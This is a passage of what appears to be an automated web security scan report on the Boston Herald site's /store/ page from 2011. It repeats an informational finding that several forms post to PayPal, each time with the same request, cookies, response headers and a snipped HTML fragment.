User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune20.gif" width="104" height="171">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.4. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune6.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.5. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jul070809.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.6. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/soxBackCopies3.gif">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.7. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan202009.gif" width="104" height="106">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_s-xclick" type="hidden">
...[SNIP]...

6.8. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct312007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.9. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune13.gif">
   
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.10. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct302007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.11. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune18c.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.12. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsSS.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.13. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/20100120.jpg" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.14. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune19.gif">


<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.15. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
